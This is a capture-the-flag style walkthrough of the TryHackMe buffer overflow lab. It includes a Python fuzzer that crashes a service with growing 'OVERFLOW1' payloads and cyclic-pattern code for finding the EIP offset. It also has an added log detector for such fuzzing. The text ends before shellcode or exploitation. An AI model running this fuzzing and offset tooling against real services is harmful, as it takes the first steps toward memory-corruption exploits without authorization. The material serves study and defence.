Buffer Overflow Challenge

I will use the lab in THM Buffer Overflow Prep.

STEPS

  • Fuzzing

  • Finding Offset

  • Finding Bad Characters

  • Finding Vulnerable Modules

  • Shellcode generation

  • Exploitation

FUZZING

#!/usr/bin/env python3

import socket, time, sys

# Target of the lab machine; replace X.X with the address THM assigns you.
ip = "10.10.X.X"

port = 1337
timeout = 5          # seconds to wait before treating the service as dead
prefix = "OVERFLOW1 "  # command handler being tested

# Start with 100 bytes of padding and grow by 100 bytes per round.
string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)  # read the banner
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)  # a missing reply (timeout/reset) means the service crashed
  except OSError:
    # socket.timeout and connection errors are OSError subclasses
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

python3 fuzzer.py crashed at 2000 bytes
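The fuzzer above leaves a very recognisable trace on the server side: one client sending the same command with a payload that grows in fixed steps, made of a single repeated byte, ending in an oversized request. The detector below is an added example, not part of the THM lab or this write-up; it assumes a hypothetical application log format (timestamp, client, command, argument length, first bytes of the argument) and uses constructed sample lines.

```python
import re
from collections import defaultdict

# Hypothetical log format: "<ts> <client> <cmd> len=<n> sample=<first bytes>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<cmd>\S+) len=(?P<len>\d+) sample=(?P<sample>\S*)$"
)

# Constructed sample log: a fuzzing ramp from 10.10.14.5 and normal traffic from 10.10.14.7.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.10.14.5 OVERFLOW1 len=100 sample=AAAAAAAAAAAAAAAA
2024-05-01T10:00:01 10.10.14.5 OVERFLOW1 len=200 sample=AAAAAAAAAAAAAAAA
2024-05-01T10:00:02 10.10.14.5 OVERFLOW1 len=300 sample=AAAAAAAAAAAAAAAA
2024-05-01T10:00:03 10.10.14.5 OVERFLOW1 len=400 sample=AAAAAAAAAAAAAAAA
2024-05-01T10:00:05 10.10.14.7 OVERFLOW1 len=12 sample=hello_world
2024-05-01T10:00:06 10.10.14.7 HELP len=0 sample=
2024-05-01T10:00:20 10.10.14.5 OVERFLOW1 len=2000 sample=AAAAAAAAAAAAAAAA
"""


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["len"] = int(rec["len"])
    return rec


def is_low_entropy(sample, min_len=8):
    """True when the argument prefix is a single repeated byte (e.g. 'AAAA...')."""
    return len(sample) >= min_len and len(set(sample)) == 1


def detect_fuzzing(log_text, max_len=1024, ramp_steps=3):
    """Flag oversized arguments and constant-step length ramps of repeated bytes.

    Returns findings in log order; a ramp is reported once per (client, command).
    """
    findings = []
    history = defaultdict(list)   # (client, cmd) -> argument lengths in arrival order
    ramp_flagged = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["client"], rec["cmd"])
        lengths = history[key]
        lengths.append(rec["len"])

        if rec["len"] > max_len:
            findings.append({"client": rec["client"], "cmd": rec["cmd"],
                             "reason": "oversize", "len": rec["len"], "ts": rec["ts"]})

        if key not in ramp_flagged and len(lengths) >= ramp_steps:
            window = lengths[-ramp_steps:]
            steps = {b - a for a, b in zip(window, window[1:])}
            if len(steps) == 1 and steps.pop() > 0 and is_low_entropy(rec["sample"]):
                ramp_flagged.add(key)
                findings.append({"client": rec["client"], "cmd": rec["cmd"],
                                 "reason": "ramp", "len": rec["len"], "ts": rec["ts"]})
    return findings


if __name__ == "__main__":
    for f in detect_fuzzing(SAMPLE_LOG):
        print("{ts} {client} {cmd}: {reason} (len={len})".format(**f))
```

Run against the constructed log it reports the ramp at the third 100-byte step and the 2000-byte oversize request; the 10.10.14.7 traffic is not flagged. The thresholds (1024 bytes, three steps) are assumptions and should be tuned to the real command's expected argument size.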

Crash Replication & Controlling EIP

In msfconsole, using the 2000 byte crash length, get the offset number.
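To show what the msfconsole step computes: the 2000 bytes sent are replaced by a pattern in which every 4-byte window is unique, so the value that lands in EIP at the crash identifies exactly how far into the buffer the saved return address sits. The code below is an added example written for this write-up, not THM's or Metasploit's code; it implements the well-known three-class pattern (Aa0Aa1...), and the `eip_hex` values used in the usage comment are constructed, not taken from the lab.

```python
import string
import struct

# The pattern is built from triplets <Upper><lower><digit>, giving 26*26*10 = 6760
# triplets (20280 bytes) before it would repeat.
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def cyclic_pattern(length):
    """Return the first `length` bytes of the Aa0Aa1...Ab0... pattern as a str."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern length exceeds maximum of 20280 bytes")
    out = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out.append(u + l + d)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern, eip_hex):
    """Map the 32-bit EIP value shown in the debugger back to a byte offset.

    x86 is little-endian, so the 4 bytes that overwrote EIP appear in memory in
    reverse order of the displayed hex value; pack the value back to its memory
    layout and search for it. Returns -1 if the value is not from the pattern.
    """
    value = int(eip_hex, 16) & 0xFFFFFFFF
    needle = struct.pack("<I", value).decode("latin-1")
    return pattern.find(needle)


if __name__ == "__main__":
    pattern = cyclic_pattern(2000)
    # Constructed crash value: memory bytes 41 62 30 41 ("Ab0A") read as 0x41306241.
    print(pattern_offset(pattern, "41306241"))  # 30
    print(pattern_offset(pattern, "42424242"))  # -1, "BBBB" is not in the pattern
```

The crash length from the fuzzer (2000 here) is the pattern length to use; once the offset is known, a payload of offset bytes of padding followed by 4 distinct bytes confirms that those 4 bytes are what ends up in EIP.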
